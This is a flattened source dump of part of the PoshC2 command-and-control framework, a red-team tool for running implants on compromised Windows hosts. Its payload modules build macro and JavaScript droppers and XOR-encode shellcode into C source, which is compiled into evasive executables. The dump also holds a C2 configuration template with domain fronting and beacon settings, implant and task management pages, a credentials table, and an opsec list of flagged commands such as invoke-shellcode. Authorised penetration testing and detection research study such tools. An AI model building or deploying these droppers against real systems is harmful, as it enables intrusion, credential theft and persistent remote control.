|__ \_ ___ \ \_____ \\ 25 | | ___/ _ \/ ___/ | \ / \ \/ / ____/ 26 | | | ( <_> )___ \| Y \ \ \____/ \\ 27 | |____| \____/____ >___| / \______ /\_______ \\ 28 | \/ \/ \/ \/ 29 | """ 30 | 31 | try: 32 | commit = subprocess.check_output(["git", "log", "-1", "--format='%h %ci'"]).decode().strip('\n').strip("'")[:-6] 33 | banner = Colours.GREEN + fr"""==== {Colours.RED}PoshC2 {VERSION} ({commit}){Colours.GREEN} ==== 34 | """ 35 | except Exception: 36 | banner = Colours.GREEN + fr"""==== {Colours.RED}PoshC2 {VERSION}{Colours.GREEN} ==== 37 | """ 38 | 39 | logo = logo + banner 40 | 41 | 42 | def run(): 43 | if sys.argv[1] == '--client': 44 | import poshc2.client as client 45 | client.start() 46 | elif sys.argv[1] == '--server': 47 | import poshc2.server as server 48 | server.start() 49 | else: 50 | print(f"Unrecognised startup arguments, expected --server/--client as first arg: {str(sys.argv)}") 51 | -------------------------------------------------------------------------------- /poshc2/client/Opsec.py: -------------------------------------------------------------------------------- 1 | # Powershell Implant 2 | ps_opsec = ["whoami", "net", "netstat", "ipconfig", "powershell", "netsh", "invoke-shellcode", "nltest", "cmd"] 3 | -------------------------------------------------------------------------------- /poshc2/client/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | import sys 3 | 4 | 5 | def start(): 6 | from poshc2.client.command_handlers.ImplantHandler import main 7 | args = sys.argv 8 | args.remove("--client") 9 | args.remove("start.py") 10 | main(args) 11 | -------------------------------------------------------------------------------- /poshc2/client/cli/AutosuggestionAggregator.py: -------------------------------------------------------------------------------- 1 | from typing import Optional 2 | 3 | from prompt_toolkit.auto_suggest import Suggestion, AutoSuggest 4 | from prompt_toolkit.document import Document 5 | 6 | 7 | class AutosuggestionAggregator(AutoSuggest): 8 | """ 9 | Give suggestions based on the multiple other suggestors. 10 | 11 | The suggestors argument should be a list of other suggestors that are checked in the order the list is in. 12 | """ 13 | 14 | def __init__(self, suggestors): 15 | self.suggestors = suggestors 16 | 17 | def get_suggestion(self, buffer: "Buffer", document: Document) -> Optional[Suggestion]: 18 | 19 | for suggestor in self.suggestors: 20 | suggestion = suggestor.get_suggestion(buffer, document) 21 | 22 | if suggestion: 23 | return suggestion 24 | 25 | return None 26 | -------------------------------------------------------------------------------- /poshc2/client/cli/CommandPromptCompleter.py: -------------------------------------------------------------------------------- 1 | import glob 2 | import re 3 | from typing import Callable, Dict, Iterable, List, Optional, Union 4 | 5 | from prompt_toolkit.completion import WordCompleter, Completer, CompleteEvent, Completion 6 | from prompt_toolkit.document import Document 7 | 8 | 9 | class FirstWordCompleter(Completer): 10 | 11 | def __init__(self, words: Union[List[str], Callable[[], List[str]]], meta_dict: Optional[Dict[str, str]] = None, WORD: bool = False) -> None: 12 | self.words = sorted(set(words)) 13 | self.meta_dict = meta_dict or {} 14 | self.WORD = WORD 15 | 16 | self.word_completer = WordCompleter(words=self.words, WORD=self.WORD) 17 | 18 | def get_completions(self, document: Document, complete_event: CompleteEvent) -> Iterable[Completion]: 19 | pattern = re.compile(r"^\S*$") 20 | if not pattern.match(document.text.strip()): 21 | return [] 22 | return self.word_completer.get_completions(document, complete_event) 23 | 24 | 25 | class FilePathCompleter(Completer): 26 | 27 | def __init__(self, path, glob: '*', meta_dict: Optional[Dict[str, str]] = None, WORD: bool = False) -> None: 28 | 29 | self.meta_dict = meta_dict or {} 30 | self.WORD = WORD 31 | self.path = path 32 | if not self.path.endswith("/"): 33 | self.path = self.path + "/" 34 | self.glob = glob 35 | 36 | def get_completions(self, document: Document, complete_event: CompleteEvent) -> Iterable[Completion]: 37 | pattern = re.compile(r"^\S*$") 38 | if not pattern.match(document.text.strip()): 39 | return [] 40 | words = [x.replace(self.path, "") for x in glob.glob(self.path + document.text.strip() + self.glob)] 41 | return WordCompleter(words=sorted(words), WORD=self.WORD).get_completions(document, complete_event) 42 | -------------------------------------------------------------------------------- /poshc2/client/cli/PoshExamplesAutosuggestions.py: -------------------------------------------------------------------------------- 1 | from typing import Optional 2 | 3 | from prompt_toolkit.auto_suggest import Suggestion, AutoSuggest 4 | from prompt_toolkit.document import Document 5 | 6 | 7 | class AutoSuggestFromPoshExamples(AutoSuggest): 8 | """ 9 | Give suggestions based on the lines examples of the helptext. 10 | """ 11 | 12 | def __init__(self, examples): 13 | self.examples = examples 14 | 15 | def get_suggestion(self, buffer: "Buffer", document: Document) -> Optional[Suggestion]: 16 | 17 | for example in self.examples: 18 | if example.startswith(document.text.strip()): 19 | return Suggestion(example[len(document.text):]) 20 | 21 | return None 22 | -------------------------------------------------------------------------------- /poshc2/client/cli/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/poshc2/client/cli/__init__.py -------------------------------------------------------------------------------- /poshc2/client/command_handlers/CommandTags.py: -------------------------------------------------------------------------------- 1 | from enum import Enum 2 | 3 | 4 | class Tag(Enum): 5 | Filesystem = 0, 6 | Injection = 1 7 | Lateral_Movement = 1, 8 | Util = 2, 9 | SOCKS = 3, 10 | Data_Gathering = 4, 11 | Credential_Harvesting = 5, 12 | Comms = 6, 13 | Help = 7, 14 | Opsec = 8, 15 | Privilege_Escalation = 8, 16 | Process_Manipulation = 9, 17 | Memory_Manipulation = 10, 18 | RDP = 11, 19 | WMI = 12, 20 | Enumeration = 13, 21 | SQL = 14, 22 | Collection = 15, 23 | Azure_AD = 16, 24 | Registry = 17, 25 | Web = 18, 26 | Core = 19, 27 | PBind = 20 28 | 29 | def get_friendly_name(self): 30 | return self.name.replace("_", " ") 31 | -------------------------------------------------------------------------------- /poshc2/client/command_handlers/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/poshc2/client/command_handlers/__init__.py -------------------------------------------------------------------------------- /poshc2/client/reporting/CSV.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from poshc2.server.Config import ReportsDirectory 4 | from poshc2.server.Core import print_bad 5 | from poshc2.server.database.Model import Task, MitreTTP 6 | from poshc2.server.database.Helpers import get_data_frame, get_implant, get_task 7 | 8 | 9 | def generate_csv(table): 10 | frame = get_data_frame(table) 11 | 12 | # convert the implant_id to Domain\User @ Hostname 13 | if table == Task: 14 | # TODO FIX 15 | for index, row in frame.iterrows(): 16 | implant = get_implant(row[1]) 17 | 18 | try: 19 | if frame.loc[index, "implant_id"]: 20 | frame.loc[index, "implant_id"] = implant.domain + "\\" + implant.user + " @ " + implant.hostname 21 | except: 22 | try: 23 | if frame.loc[index, "implant_id"]: 24 | frame.loc[index, "implant_id"] = implant.domain + "\\" + implant.user + " @ " + implant.hostname 25 | except: 26 | print("Cannot translate implant_id") 27 | elif table == MitreTTP: 28 | for index, row in frame.iterrows(): 29 | task = get_task(row[4]) 30 | implant = get_implant(task.implant_id) 31 | frame.loc[index, "context"] = implant.domain + "\\" + implant.user + " @ " + implant.hostname 32 | frame.loc[index, "timestamp"] = task.completed_time 33 | frame.loc[index, "command"] = task.command 34 | 35 | del frame["task_id"] 36 | 37 | csv_report_name = f"{ReportsDirectory}{table.__tablename__}.csv" 38 | output_csv = open(csv_report_name, 'w') 39 | CSV = (frame.to_csv(index=False, encoding='utf-8')) 40 | output_csv.write(CSV) 41 | output_csv.close() 42 | print(f" {csv_report_name}") 43 | -------------------------------------------------------------------------------- /poshc2/client/reporting/ReportKeys.py: -------------------------------------------------------------------------------- 1 | from enum import Enum 2 | 3 | 4 | class ReportKeys(Enum): 5 | tasks = ['id', 'context', 'command', 'output', 'user', 'sent_time', 'completed_time', 'implant_id'] 6 | 7 | c2_server = ['id', 'payload_comms_host', 'encryption_key', 'domain_front_header', 'default_sleep', 'kill_date', 'get_404_response', 8 | 'posh_project_directory', 'hosted_file_url', 'download_url', 'proxy_url', 'proxy_username', 'proxy_password', 'urls', 9 | 'socks_urls', 'insecure', 'user_agent', 'referer', 'pushover_api_token', 'pushover_api_user', 'slack_user_id', 10 | 'slack_channel', 'slack_bot_token', 'notifications_enabled'] 11 | 12 | creds = ['id', 'domain', 'username', 'password', 'hash'] 13 | 14 | implants = ['numeric_id', 'implant_id', 'url_id', 'context', 'ip_address', 'encryption_key', 'first_seen', 'last_seen', 15 | 'process_id', 'process_name', 'architecture', 'alive', 'sleep', 'loaded_modules', 'type', 'label'] 16 | 17 | urls = ['id', 'name', 'url', 'host_header', 'proxy_url', 'proxy_username', 'proxy_password', 'credential_expiry'] 18 | 19 | opsec_entries = ['id', 'date', 'owner', 'event', 'note'] 20 | 21 | mitre_ttps = ['id', 'technique_id', 'technique_name', 'tactics', 'context', 'timestamp', 'command'] 22 | -------------------------------------------------------------------------------- /poshc2/client/reporting/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/poshc2/client/reporting/__init__.py -------------------------------------------------------------------------------- /poshc2/server/Cert.py: -------------------------------------------------------------------------------- 1 | from os.path import exists, join 2 | 3 | from OpenSSL import crypto 4 | 5 | from poshc2.server.Config import Cert_C, Cert_ST, Cert_L, Cert_O, Cert_OU, Cert_CN, Cert_SerialNumber, Cert_NotBefore, Cert_NotAfter 6 | 7 | CERT_FILE = "posh.crt" 8 | KEY_FILE = "posh.key" 9 | 10 | 11 | def create_self_signed_cert(cert_dir): 12 | """ 13 | If datacard.crt and datacard.key don't exist in cert_dir, create a new 14 | self-signed cert and keypair and write them into that directory. 15 | 16 | easy_install pyopenssl 17 | """ 18 | 19 | if not exists(join(cert_dir, CERT_FILE)) or not exists(join(cert_dir, KEY_FILE)): 20 | # create a key pair 21 | k = crypto.PKey() 22 | k.generate_key(crypto.TYPE_RSA, 2048) 23 | # create a self-signed cert 24 | cert = crypto.X509() 25 | cert.get_subject().C = Cert_C 26 | cert.get_subject().ST = Cert_ST 27 | cert.get_subject().L = Cert_L 28 | cert.get_subject().O = Cert_O 29 | cert.get_subject().OU = Cert_OU 30 | cert.get_subject().CN = Cert_CN 31 | cert.set_serial_number(Cert_SerialNumber) 32 | cert.gmtime_adj_notBefore(Cert_NotBefore) 33 | cert.gmtime_adj_notAfter(Cert_NotAfter) 34 | cert.set_issuer(cert.get_subject()) 35 | cert.set_pubkey(k) 36 | cert.sign(k, 'sha1') 37 | 38 | open(join(cert_dir, CERT_FILE), "wb").write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert)) 39 | open(join(cert_dir, KEY_FILE), "wb").write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k)) 40 | -------------------------------------------------------------------------------- /poshc2/server/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import sys 4 | 5 | 6 | def start(): 7 | from poshc2.server.C2Server import main 8 | args = sys.argv 9 | args.remove("--server") 10 | args.remove("start.py") 11 | main(args) 12 | -------------------------------------------------------------------------------- /poshc2/server/database/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from poshc2.server.Config import Database 4 | from sqlalchemy import create_engine 5 | from sqlalchemy.orm import sessionmaker, scoped_session 6 | from sqlalchemy.ext.declarative import declarative_base 7 | 8 | database_engine = create_engine(Database, connect_args={"check_same_thread": False}, echo=False) # set echo=True to get database debug output 9 | Base = declarative_base() 10 | 11 | from .Model import * 12 | 13 | Base.metadata.create_all(database_engine) 14 | session_factory = sessionmaker(bind=database_engine) 15 | Session = scoped_session(session_factory) 16 | -------------------------------------------------------------------------------- /poshc2/server/payloads/JS-Payloads.py: -------------------------------------------------------------------------------- 1 | from poshc2 import Colours 2 | from poshc2.server.Config import PayloadTemplatesDirectory 3 | 4 | 5 | # TODO this doesn't appear to actually edit the payload at all? 6 | def create_payloads(payloads, name): 7 | payloads.quickstart_log(Colours.END) 8 | payloads.quickstart_log("JS files:") 9 | 10 | with open(f"{PayloadTemplatesDirectory}dropper.js", 'r') as f: 11 | dropper = f.read() 12 | 13 | payloads.quickstart_log(f"JS Payload written to: {payloads.output_directory}{name}Launcher.js") 14 | filename = f"{payloads.output_directory}Launcher.js" 15 | output_file = open(filename, 'w') 16 | output_file.write(dropper) 17 | output_file.close() 18 | -------------------------------------------------------------------------------- /poshc2/server/payloads/Macro-Payloads.py: -------------------------------------------------------------------------------- 1 | from poshc2 import Colours 2 | from poshc2.Utils import format_macro 3 | from poshc2.server.Config import PayloadTemplatesDirectory 4 | 5 | 6 | def create_payloads(payloads, name): 7 | payloads.quickstart_log(Colours.END) 8 | payloads.quickstart_log(f"Macro Payload written to: {payloads.output_directory}{name}macro.txt") 9 | 10 | strmacro = format_macro("str", str(payloads.create_raw_base())) 11 | with open(f"{PayloadTemplatesDirectory}dropper.macro", 'r') as f: 12 | content = f.read() 13 | content = str(content).replace("#REPLACEME#", strmacro) 14 | 15 | with open(f"{payloads.output_directory}{name}macro.txt", 'w') as f: 16 | f.write(content) 17 | -------------------------------------------------------------------------------- /poshc2/server/payloads/XOR-Payloads.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | 3 | from poshc2.server.Config import PayloadTemplatesDirectory, XOR_KEY 4 | from poshc2.server.payloads.Payloads import PayloadType 5 | 6 | 7 | def xor(data, key): 8 | key = key 9 | output = [] 10 | for i in range(len(data)): 11 | current = data[i] 12 | current_key = key[i % len(key)] 13 | output.append(current ^ current_key) 14 | 15 | return output 16 | 17 | 18 | def c_char_arr(name, value): 19 | return 'char ' + name + '[]' + '=''{0x' + ',0x'.join(hex(x)[2:] for x in value) + '};' 20 | 21 | 22 | def generate_xor_dropper(payloads, name, arch, payloadtype): 23 | # Get the shellcode based on the architecture 24 | with open(f"{payloads.output_directory}{name}{payloadtype}_{arch}_Shellcode.bin", 'rb') as f: 25 | shellcode_source = f.read() 26 | 27 | enc = xor(shellcode_source, XOR_KEY) 28 | shellcode = c_char_arr('sc', enc) 29 | 30 | # Create the raw C file from the template 31 | with open(f"{PayloadTemplatesDirectory}dropper.xor", 'r') as f: 32 | content = f.read() 33 | 34 | content = str(content).replace("#REPLACEME#", shellcode).replace("#REPLACE_XOR_KEY#", c_char_arr('key', XOR_KEY)) 35 | with open(f"{payloads.output_directory}{name}{payloadtype}_{arch}_xor.c", 'w') as f: 36 | f.write(content) 37 | 38 | payloads.quickstart_log( 39 | f"XORed shellcode source written to: {payloads.output_directory}{name}{payloadtype}_{arch}_xor.c") 40 | 41 | if arch == "x64": 42 | compiler = "x86_64-w64-mingw32-gcc" 43 | elif arch == "x86": 44 | compiler = "i686-w64-mingw32-gcc" 45 | else: 46 | payloads.quickstart_log("ERROR: verify the architecture") 47 | return 48 | 49 | subprocess.check_output( 50 | f"{compiler} -s -w {payloads.output_directory}{name}{payloadtype}_{arch}_xor.c -o {payloads.output_directory}{name}{payloadtype}_{arch}_xor.exe", 51 | shell=True) 52 | 53 | payloads.quickstart_log( 54 | f"XORed EXE payload written to: {payloads.output_directory}{name}{payloadtype}_{arch}_xor.exe") 55 | 56 | 57 | def create_payloads(payloads, name): 58 | archs = ["x86", "x64"] 59 | 60 | for arch in archs: 61 | for payloadtype in PayloadType: 62 | generate_xor_dropper(payloads, name, arch, payloadtype.value) 63 | -------------------------------------------------------------------------------- /poshc2/server/payloads/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/poshc2/server/payloads/__init__.py -------------------------------------------------------------------------------- /resources/SharpSocks/SharpSocksServer.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/SharpSocks/SharpSocksServer.zip -------------------------------------------------------------------------------- /resources/beacon-data/cat.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/cat.png -------------------------------------------------------------------------------- /resources/beacon-data/d.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/d.png -------------------------------------------------------------------------------- /resources/beacon-data/dog.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/dog.png -------------------------------------------------------------------------------- /resources/beacon-data/fb.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/fb.jpg -------------------------------------------------------------------------------- /resources/beacon-data/fg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/fg.png -------------------------------------------------------------------------------- /resources/beacon-data/i.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/i.png -------------------------------------------------------------------------------- /resources/beacon-data/in.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/in.png -------------------------------------------------------------------------------- /resources/beacon-data/paw.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/paw.png -------------------------------------------------------------------------------- /resources/beacon-data/pn.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/pn.png -------------------------------------------------------------------------------- /resources/beacon-data/we.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/beacon-data/we.gif -------------------------------------------------------------------------------- /resources/config-template.yml: -------------------------------------------------------------------------------- 1 | # These options are loaded into the database on first run, changing them after 2 | # that must be done through commands (such as set-defaultbeacon), or by 3 | # creating a new project 4 | 5 | # ===================================================== 6 | # CONFIG YOU HAVE TO SET 7 | # ===================================================== 8 | 9 | ProjectName: "Public-Project" # for pipelines 10 | UserAgent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36" # need to manually specify UserAgent, default is not an option 11 | KillDate: "2999-01-01" # yyyy-MM-dd 12 | NotificationsProjectName: "PoshC2" 13 | 14 | # Payload comms urls, will failover in order listed here. All need to be the same protocol (http/https). 15 | # Format -> Connect-url: host header e.g. 16 | # - https://frontable.com: endpoint.cdn.com 17 | # - "https://direct.com:8080": "" 18 | PayloadComms: 19 | - "https://127.0.0.1": "" 20 | 21 | # ===================================================== 22 | # OPTIONAL CONFIG 23 | # ===================================================== 24 | 25 | # Server Config 26 | BindIP: '0.0.0.0' 27 | BindPort: 443 28 | 29 | # Database Config 30 | DatabaseType: "SQLite" # or PostgreSQL 31 | PostgresConnectionString: "dbname='poshc2_project_x' port='5432' user='admin' host='192.168.111.111' password='XXXXXXX'" # Only used if PostgreSQL in use 32 | 33 | # Pipeline Options 34 | PipelineEnabled: False 35 | 36 | # Comms Options 37 | Referer: "" # optional 38 | ServerHeader: "Apache" 39 | DefaultSleep: "5s" 40 | Jitter: 0.20 41 | UrlConfig: "urls" # Beacon URLs will be taken from resources/urls.txt if value is 'urls'. If value is 'wordlists' beacon URLs will be randomly generated on server creation from resources/wordlist.txt 42 | 43 | # Payload Options 44 | PayloadStageRetries: true 45 | PayloadStageRetriesInitialWait: 60 # Stager will retry after this many seconds, doubling the wait each time if it fails 46 | PayloadStageRetriesLimit: 30 # Stager retry attempts before failing 47 | PayloadDomainCheck: "" # If non-empty then the UserDomain on the target will be checked and if it 'contains' this value then the payload will execute, else it will not. 48 | 49 | # Notifications Options 50 | EnableNotifications: "No" 51 | 52 | # Slack - https://slack.com/ 53 | Slack_BotToken: "" # The token used by the application to authenticate. Get it from https://[YourSlackName].slack.com/apps/A0F7YS25R (swap out [YourSlackName]). Should start with xobo-. 54 | Slack_UserID: "" # Found under a users profile (i.e UHEJYT2AA). Can also be "channel". 55 | Slack_Channel: "" # i.e #bots 56 | 57 | # PBind Options 58 | PBindPipeName: "jaccdpqnvbrrxlaf" 59 | PBindSecret: "mtkn4" 60 | 61 | # FComm Options 62 | FCommFilePath: "C:\\Users\\Public\\Public.ost" 63 | 64 | # Pipelines 65 | JenkinsServer: "https://jenkins.pipelines.local" 66 | JenkinsKey: "" 67 | NexusServer: "https://nexus.pipelines.local" 68 | NexusKey: "" 69 | 70 | # Pushover - https://pushover.net/ 71 | Pushover_APIToken: "" 72 | Pushover_APIUser: "" 73 | 74 | # SOCKS Proxying Options 75 | SocksHost: "https://0.0.0.0:49031" # The host the C2 http requests communicate with - not the port the SOCKS client connects to. Most cases should be left like this and set in rewrite rules. 76 | 77 | # XOR key 78 | XOR_KEY: "random_alphanum_key_goes_here" 79 | -------------------------------------------------------------------------------- /resources/html-templates/autoruns.html: -------------------------------------------------------------------------------- 1 | {% include "header.html" %} 2 |
3 |
4 |
Autoruns
5 |
6 |
7 |
8 | Add new autorun task: 9 |
10 | 11 |
12 | 13 |
14 |
15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | {% for autorun in autoruns %} 25 | 26 | 27 | 28 | 35 | 36 | {% endfor %} 37 |
#TASKACTION
{{autorun.id}}{{autorun.task}} 29 | 30 | 33 | 34 |
38 |
39 |
40 | -------------------------------------------------------------------------------- /resources/html-templates/components/autocomplete.html: -------------------------------------------------------------------------------- 1 |
    2 | {% for cmd in commands%} 3 |
  • {{cmd}}
    • 4 | {% endfor %} 5 |
6 | 7 | 15 | -------------------------------------------------------------------------------- /resources/html-templates/components/c2_message_logs.html: -------------------------------------------------------------------------------- 1 | {% autoescape true %} 2 |
3 | {% for c2messages in c2messages %} 4 |

> {{ c2messages.message |replace("[94m","") | replace("[0m","") | replace("", "") }}

5 | {% endfor %} 6 |
7 | {% endautoescape %} 8 | -------------------------------------------------------------------------------- /resources/html-templates/components/commands_form.html: -------------------------------------------------------------------------------- 1 | 23 | -------------------------------------------------------------------------------- /resources/html-templates/components/implants_table.html: -------------------------------------------------------------------------------- 1 | {%if implants|length > 0 %} 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 16 | 17 | {% for implant in implants %} 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 35 | 36 | {% endfor %} 37 |
#Last seenProcess nameProcess IDSleepUsername@machineArchitectureImplant typeLabelAction 15 |
{{implant.numeric_id}}{{implant.last_seen}}{{implant.process_name}}{{implant.process_id}}{{implant.sleep}}{{implant.domain}}\{{implant.user}}@{{implant.hostname}}{{implant.architecture}}{{implant.type}}{{implant.label}} 29 | 30 | 33 | 34 |
38 | {% else %} 39 |
There are no active implants yet
40 | {%endif %} 41 | 42 | 88 | -------------------------------------------------------------------------------- /resources/html-templates/home.html: -------------------------------------------------------------------------------- 1 | {% include "header.html" %} 2 |
3 |
4 |
5 |
Simple API Interface
6 | 7 |
8 |
9 |

10 | Lorem ipsum, dolor sit amet consectetur adipisicing elit. Amet laborum nostrum nulla, similique quibusdam 11 | tempore eius quas aliquam magni illo aspernatur reiciendis consectetur at ut dignissimos. Beatae corrupti ut 12 | labore? 13 |

14 |
15 | 17 | 18 |

Read the Docs

19 | 20 | 21 | 22 |

Swagger

23 | 24 | 26 | 27 |

GitHub

28 | 29 |
30 |
31 |
32 |
33 | 34 | 55 | -------------------------------------------------------------------------------- /resources/html-templates/include/css/fonts/bootstrap-icons.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/html-templates/include/css/fonts/bootstrap-icons.woff -------------------------------------------------------------------------------- /resources/html-templates/include/css/fonts/bootstrap-icons.woff2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/html-templates/include/css/fonts/bootstrap-icons.woff2 -------------------------------------------------------------------------------- /resources/html-templates/include/img/logo-for-dark.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/html-templates/include/img/logo-for-dark.webp -------------------------------------------------------------------------------- /resources/html-templates/include/img/logo-for-light.webp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/html-templates/include/img/logo-for-light.webp -------------------------------------------------------------------------------- /resources/html-templates/payloads.html: -------------------------------------------------------------------------------- 1 | {% include "header.html" %} 2 |
3 |
4 |
Payloads
5 |
6 |
7 |
8 | Upload new file: 9 |
10 | 11 |
12 | 13 |
14 |
15 |
16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | {% for image in images %} 25 | 26 | 27 | 30 | 37 | 38 | {% endfor %} 39 |
#PAYLOADACTION
{{loop.index}} 28 | {{image}} 29 | 31 | 32 | 35 | 36 |
40 |
41 |
42 | -------------------------------------------------------------------------------- /resources/html-templates/reports.html: -------------------------------------------------------------------------------- 1 | {% include "header.html" %} 2 |
3 |
4 |
Reports
5 |
6 |
7 | Generate Reports 8 |
9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | {% for report in reports %} 19 | 20 | 21 | 24 | 31 | 32 | {% endfor %} 33 |
#REPORTACTION
{{loop.index}} 22 | {{report}} 23 | 25 | 26 | 29 | 30 |
34 |
35 |
36 | -------------------------------------------------------------------------------- /resources/html-templates/tasksview.html: -------------------------------------------------------------------------------- 1 | {% include "header.html" %} 2 |
3 |
4 |
Queued Tasks
5 |
6 |
7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | {% for task in new_tasks %} 18 | 19 | 20 | 21 | 22 | 23 | 30 | 31 | {% endfor %} 32 |
#IMPLANT IDCOMMANDUSERACTION
{{task.id}}{{task.implant_id}}{{task.command}}{{task.user}} 24 | 25 | 28 | 29 |
33 |
34 |
35 | -------------------------------------------------------------------------------- /resources/images/PoshC2Logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/images/PoshC2Logo.png -------------------------------------------------------------------------------- /resources/images/ReportLogo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/images/ReportLogo.png -------------------------------------------------------------------------------- /resources/images/firewall.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/images/firewall.png -------------------------------------------------------------------------------- /resources/images/implant.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/images/implant.png -------------------------------------------------------------------------------- /resources/mitre-mapping.yml: -------------------------------------------------------------------------------- 1 | - command: "sharpservice" 2 | ttps: 3 | - id: "T1569.002" 4 | name: "System Services: Service Execution" 5 | tactics: 6 | - "Execution" 7 | 8 | - command: "steal-token" 9 | ttps: 10 | - id: "T1134.001" 11 | name: "Access Token Manipulation: Token Impersonation/Theft" 12 | tactics: 13 | - "Defense Evasion" 14 | - "Privilege Escalation" 15 | 16 | - command: "make-token" 17 | ttps: 18 | - id: "T1134.003" 19 | name: "Access Token Manipulation: Make and Impersonate Token" 20 | tactics: 21 | - "Defense Evasion" 22 | - "Privilege Escalation" 23 | 24 | - command: "sharpcreateproc" 25 | ttps: 26 | - id: "T1134.003" 27 | name: "Access Token Manipulation: Make and Impersonate Token" 28 | tactics: 29 | - "Defense Evasion" 30 | - "Privilege Escalation" 31 | 32 | - command: "sharpprocesslist" 33 | ttps: 34 | - id: "1057" 35 | name: "Process Discovery" 36 | tactics: 37 | - "Discovery" 38 | 39 | - command: "sharpwinrm" 40 | ttps: 41 | - id: "T1021.006" 42 | name: "Remote Services: Windows Remote Management" 43 | tactics: 44 | - "Lateral Movement" 45 | 46 | - command: "user-logons" 47 | ttps: 48 | - id: "T1021" 49 | name: "Remote Services" 50 | tactics: 51 | - "Lateral Movement" 52 | - id: "T1033" 53 | name: "System Owner/User Discovery" 54 | tactics: 55 | - "Discovery" 56 | 57 | - command: "grep" 58 | ttps: 59 | - id: "T1083" 60 | name: "File and Directory Discovery" 61 | tactics: 62 | - "Discovery" 63 | - id: "T1005" 64 | name: "Data from Local System" 65 | tactics: 66 | - "Collection" -------------------------------------------------------------------------------- /resources/modules/CSharp-OracleClient.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/CSharp-OracleClient.exe -------------------------------------------------------------------------------- /resources/modules/Certify.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Certify.exe -------------------------------------------------------------------------------- /resources/modules/DNSResolve.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/DNSResolve.exe -------------------------------------------------------------------------------- /resources/modules/Daisy.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nettitude/PoshC2/f6f13309188c9f6467867d4afd27aaefb70bd9b8/resources/modules/Daisy.dll 